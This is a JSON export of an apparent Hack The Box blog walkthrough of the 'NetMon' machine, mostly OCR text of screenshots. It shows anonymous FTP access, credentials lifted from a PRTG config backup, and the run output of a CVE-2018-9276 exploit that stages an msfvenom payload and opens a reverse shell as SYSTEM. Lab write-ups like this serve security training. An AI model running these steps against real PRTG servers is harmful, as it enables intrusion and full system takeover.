{"id":60,"date":"2021-02-13T19:19:14","date_gmt":"2021-02-13T19:19:14","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=60"},"modified":"2021-02-13T19:30:25","modified_gmt":"2021-02-13T19:30:25","slug":"htb-netmon-walkthrough","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/13\/htb-netmon-walkthrough\/","title":{"rendered":"HTB &#8211; NetMon Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/UR9PVxor9D3w3KrKxT-BKiBsLDZBCEfeGPZvkZaac5bb9QfMvnaqkqd__3dAyWT8jKO5YBNxo_q5Ztqx7CCFkpEWktnIqITILg14WSL7SMRV2e2orom2uXVxvZvdYtb3X_I1Kv2r\" alt=\"PORT \n21\/tcp \nSTATE SERVICE \nopen ftp \nVERSION \nMicrosoft ftpd \nftp-anon: \n02-03-19 \n02-25-19 \n07-16-16 \n02-25-19 \n02-03-19 \n02-03-19 \n02-25-19 \nftp-syst: \nAnonymous \n10 : 15PPl \n09: 18Am \n10 \n12 : 28AM \n08 : 08APl \n11:49PPl \nFTP \nSYST: Windows NT \n80\/tcp open http \nlogin \nIndy \nI http-favicon: Unknown favicon \nI http-methods: \nSupported methods: GET HEAD \nI http-server-header: PRTG\/18.1. \nallowed (FTP code 230) \n1024 .rnd \ninetpub \nperfLogs \nProgram Files \nProgram Files (x86) \nUsers \nWindows \nhttpd 18. 1.37. 13946 (Paessler PRTG bandwidth monitor) \n3683EF286FA48EF88797A09668456479 \nPOST OPTIONS \n37 . 13946 \nI http-title: Welcome I PRTG Network monitor (NETMON) \nI Requested resource was \/ index. htm \nI http-trane- \n135\/tcp \n139\/tcp \n445\/tcp \nService \nopen \nopen \nopen \nInfo: \ninfo: Problem \nmsrpc \nnetbios-ssn \nmicrosoft-ds \nOSS : Windows, \nwith XML parsing of \/evox\/about \nMicrosoft Windows RPC \nMicrosoft Windows netbios-ssn \nMicrosoft Windows Server 2008 R2 \n2012 microsoft-ds \nWindows Server 2008 R2 \n2012; CPE: cpe:\/o:microsoft:windows \"\/><\/figure>\n\n\n\n<p>Anonymous FTP<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/DV4jTvF8VAzoi2wjTQ34NDTudjC0y4v1iVaB7VKK6A2r8UhdKS0Iz3wdJ1dXXZKCNddyarhiAtFKnR4qYwsflt1rXkn5atzD-TlN4msbo7s7U3DHvl708FTYNvJowBnk1DkOPQ2V\" alt=\"0 1 ne system cannot \nT In \no tne \nftP&gt; Is -la \n200 PORT command successful. \nT 1 ce spec1T1eo. \n125 Data \n11-20-16 \n02-03-19 \n11-20-16 \n07-16-16 \n02-03-19 \n02-25-19 \n07-01-19 \n07-16-16 \n02-25-19 \n02-03-19 \n02-25-19 \n02-03-19 \n02-03-19 \n02-03-19 \n02-25-19 \nconnection already open; Transfer starting. \n10 : 46pm \n12: 18M \n09 \n08 : 05M \n10 : 15PPl \n12 \n09: 18M \n12: 28M \n08 : 05M \n08 : 04M \n08 : 08M \n11 \ncomplete. \n1024 \n389408 \n1 \n738197504 \n$RECYCLE . BIN \n. rnd \nbootmgr \nBOOTNXT \nDocuments and Settings \ninetpub \npagefile.sys \nperfLogs \nProgram Files \nProgram Files (x86) \nProgramData \nRecovery \nSystem Volume Information \nUsers \nWindows \n226 Transfer \nftP&gt; cd ProgramData \n250 CWD command successful. \"\/><\/figure>\n\n\n\n<p>PRTG Files are under C:\\ProgramData\\Paessler\\PRTG Network Manager<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/UoC4DuwKmHglOoe66ZLNVAnJQ9nWQ7Ug7YieI67VjtAPouXFbqsnyuCYmTvkVVuvmNIpDUgCEkHoAoYPRtjkgFpZ7VtUuFuPI3J2knDXwpUrbOst1mgAkqkzKrzZyvdIXND4XmgH\" alt=\"ftP&gt; cd ProgramData \n250 CWD command successful. \nftP&gt; Is \n200 PORT command successful. \n125 Data \n02-03-19 \n11-20-16 \n02-03-19 \n02-03-19 \n07-16-16 \n02-03-19 \n11-20-16 \n11-20-16 \n02-25-19 \nconnection al ready open; \n12: 15AM \n10 \n12: 18AM \n08 : 05AM \n09: 18AM \n12: 15AM \n10 \ncomplete. \n226 Transfer \nftP&gt; cd Paessler \n250 CWD command successful. \nftP&gt; Is -la \n200 PORT command successful. \n125 Data connection al ready open; \n07-01-19 03:38PPl \n226 Transfer complete. \nftP&gt; cd \u201dPRTG Network Monitor&quot; \n250 CWD command successful. \nftP&gt; Is \n200 PORT command successful. \nTransfer star ting. \nLicenses \nMicrosoft \nPaessler \nregid. 1991-06. com . microsoft \nSoftwareDistribution \nTEMP \nUSOPrivate \nUSOShared \nVMware \nTransfer star ting. \nPRTG Network Monitor \nTransfer star ting. \n125 Data \n02-03-19 \n07-01-19 \n02-03-19 \n02-03-19 \n02-03-19 \n07-01-19 \n07-01-19 \n02-25-19 \n02-25-19 \nconnection al ready open; \n12 : \n12: 18AM \n12: 18AM \n12: 18AM \n1189697 \n1189697 \nConfigurat ion Auto-Backups \nLog Database \nLogs (Debug) \nLogs (Sensors) \nLogs (System) \nLogs (Web Server) \nMonitoring Database \nPRTG Configurat ion. dat \nPRTG Configurat ion. old \"\/><\/figure>\n\n\n\n<p>Looking for password<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/zXb3Nl_rZ8U6miY5OQNTg6SYCHOPA6jOcF0rHYeLQkYmX0aN08b5ULR3sITQJJrlgdcN3eSdZS41Q2pLKwv4TZgZHmi9GTDMBi-fnQDHXvVXgefHl54iQkoN9ZDiasQyal9ItCPV\" alt=\"cat \n&quot;PRTG Configuration.old.bak&quot; \ngrep \n-C 3 prtgadmin \n<\/dbcredentials&gt; \n<dbpassword&gt; \nUser: prtgadmin \nPrTg@dmin2018 \n<\/dbpassword&gt; \n<dbtimeout&gt; \n43499 . 7768071065 \nprtgadmin \n<name&gt; \nPRTG System Administrator \nroot@kati : \/home\/kaIisa\/HTB\/netmon# \"\/><\/figure>\n\n\n\n<p>The version of PRTG is vulnerable<\/p>\n\n\n\n<p>Use the following exploit:<\/p>\n\n\n\n<p><a href=\"https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py\">https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/gnzVx5Ei3WO_nD55okGSgyAKn7-5sKbhWd3Z48i-VbAXJX5RthtXI5YVzPLKRAq330Fn39JQ2MD5ltPltogpuEk5vZweS0c2Opz315ozhp9in7zLjnf0HKjHtMAP4m0Ow5b1wfgL\" alt=\"python CVE-2018-9276.py -i \n80 --lhost \n10.10. 10.152 \n10.10. 14.13 \n-p \n[PRTG\/18.1.37.13946] is Vulnerable! \nExploiting [10. 10. 10. 152: 80] as [prtgadmin\/PrTg@dmin2019] \nSession obtained for [prtgadmin:PrTg@dmin2019] \n-Iport 8888 \n--user prtgadmin \n- -password PrTg@dmin2019 \nFile staged at successfully with objid of \nSession obtained for [prtgadmin:PrTg@dmin2019] \nNotification with objid [2018] staged for execution \n[2018] \nGenerate msfvenom payload with [LHOST=IO. 10. 14.13 LPORT=8888 OUTPUT=\/tmp\/nhgcapgw.dll] \nNo platform was selected, choosing Plsf: :module: :Platform: :Windows from the payload \nNo arch selected, selecting arch: x86 from the payload \nNo encoder or badchars specified, outputting raw payload \nPayload size: 324 bytes \nFinal size of dll file: 5120 bytes \nConfig file parsed \nCallback added for UUID 48324FC8-1670-01D3-1278-5A478F6EE188 V:3.O \nCallback added for UUID 68FFD098-A112-3610-9833-46C3F87E345A V: 1.0 \nConfig file parsed \nHosting payload at \nSession obtained for [prtgadmin:PrTg@dmin2019] \nCommand staged at successfully with objid of [2019] \nSession obtained for [prtgadmin:PrTg@dmin2019] \nNotification with objid [2019] staged for execution \nAttempting to kill the impacket thread \nImpacket will maintain its own thread for active connections, so you may find it's still listening on \nps aux I grep <script name&gt; and kill -9 <pid&gt; if it is still running : ) \nThe connection will eventually time out. \nListening on [10.10.14.13:8888 for the reverse shell!] \nlistening on [any] 8888 \nIncoming connection (10.10. 10. 152, 53994) \nAUTHENTICATE MESSAGE (N, NETMON) \n[ *J User \\NETPION authenticated successfully \n:4141414141414141 \"\/><\/figure>\n\n\n\n<p>I got NT Authority\\System<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/SPhoo60NmoktgZ7IPhYvQ_j_0wljW_N634VvVHYPRsivxZA5uJIMsk4sSG21Pb9oMYisME63e4a7zV_Nm4NzP5BAv9nk0_nVz686Rqm1--oAnmF4DmnE-Xw-AJRlNBwKoBUXGbVF\" alt=\"[+] Listening on [10.10.14.13:8888 for the reverse shell!] \nlistening on [any] 8888 \nIncoming connection (10.10. 10.152, 53994) \nAUTHENTICATE MESSAGE (N, NETMON) \n[ *J User \\NETPION authenticated successfully \n:4141414141414141 \nconnect to [10.10. 14.13] from (UNKNOWN) [10.10. 10.152] \nMicrosoft Windows [Version 10.0. 14393] \n(c) 2016 Microsoft Corporation. All rights reserved. \nDisconnecting Share(1:IPC$) \nwhoami \nwhoami \nnt authority\\system \n53996 \"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap Anonymous FTP PRTG Files are under C:\\ProgramData\\Paessler\\PRTG Network Manager Looking for password The version of PRTG is vulnerable Use the following exploit: https:\/\/raw.githubusercontent.com\/wildkindcc\/CVE-2018-9276\/master\/CVE-2018-9276.py I got NT Authority\\System<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=60"}],"version-history":[{"count":1,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions"}],"predecessor-version":[{"id":61,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/60\/revisions\/61"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=60"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=60"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=60"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}